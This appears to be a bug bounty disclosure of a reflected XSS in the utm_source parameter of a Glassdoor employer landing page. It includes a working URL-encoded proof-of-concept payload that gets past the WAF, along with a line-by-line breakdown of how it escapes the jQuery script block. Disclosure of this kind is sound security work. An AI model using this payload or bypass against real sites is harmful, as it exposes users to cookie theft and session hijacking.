Reflected XSS on https://www.glassdoor.com/employers/sem-dual-lp/
Summary:
There is a reflected XSS on https://www.glassdoor.com/employers/sem-dual-lp/ through the utm_source parameter. By using URL encoding I was able to bypass the WAF.
Affected URL or select Asset from In-Scope:
https://www.glassdoor.com/
Affected Parameter:
utm_source
Vulnerability Type:
XSS
Browsers tested:
Firefox 75.0
Steps To Reproduce:
- Visit the following POC link:
1https://www.glassdoor.com/employers/sem-dual-lp/?utm_source=abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
Explanation
The utm_source parameter is not escaped properly for URL encoded values. We can escape at multiple locations in the source. I escaped in the script section. The payload finished open function calls from jQuery, executes an alert as POC and then finished the original script tag. Basically we can dissect it as follows:
1abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
2
3is url encoded for
4
5abc`;return+false});});alert`xss`;</script>
6
7which is used like
8
9abc`; Finish the string
10return+false}); Finish the jQuery click function
11}); Finish the jQuery ready function
12alert`xss`; Here we can execute our code
13</script> This closes the script tag to prevent JavaScript parsing errors
Supporting Material/References (screenshots, logs, videos):
Impact
A XSS attack allows an attacker to execute arbitrary JavaScript in the context of the attacked website and the attacked user. This can be abused to steal session cookies, perform requests in the name of the victim or for phishing attacks.